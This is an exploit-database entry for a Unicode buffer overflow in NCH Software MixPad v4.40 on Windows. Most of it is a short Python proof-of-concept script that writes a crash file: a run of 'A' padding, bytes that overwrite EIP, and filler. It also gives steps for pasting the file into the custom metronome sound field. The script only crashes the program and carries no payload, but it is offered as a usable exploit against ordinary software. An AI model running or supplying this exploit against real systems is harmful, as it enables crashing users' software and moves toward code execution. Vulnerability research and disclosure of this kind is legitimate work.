MixPad v4.40 - Unicode Buffer Overflow Exploit

2018-12-13T00:00:00
ID 1337DAY-ID-31776
Type zdt
Reporter Gionathan Reale
Modified 2018-12-13T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            #!/usr/bin/python
# Exploit Author: Gionathan "John" Reale
# Exploit Title: NCH Software MixPad v4.40 - Unicode Buffer Overflow
# Date: 2018-12-12
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/
# Version: v4.40-v4.10
# Tested On: Windows 7
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' 


filename="crash.txt"
 
junk = "A"*249
eip = "\xcc"*2  			
fill = "B"*100				
buffer = junk + eip + fill

  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

#  0day.today [2018-12-24]  #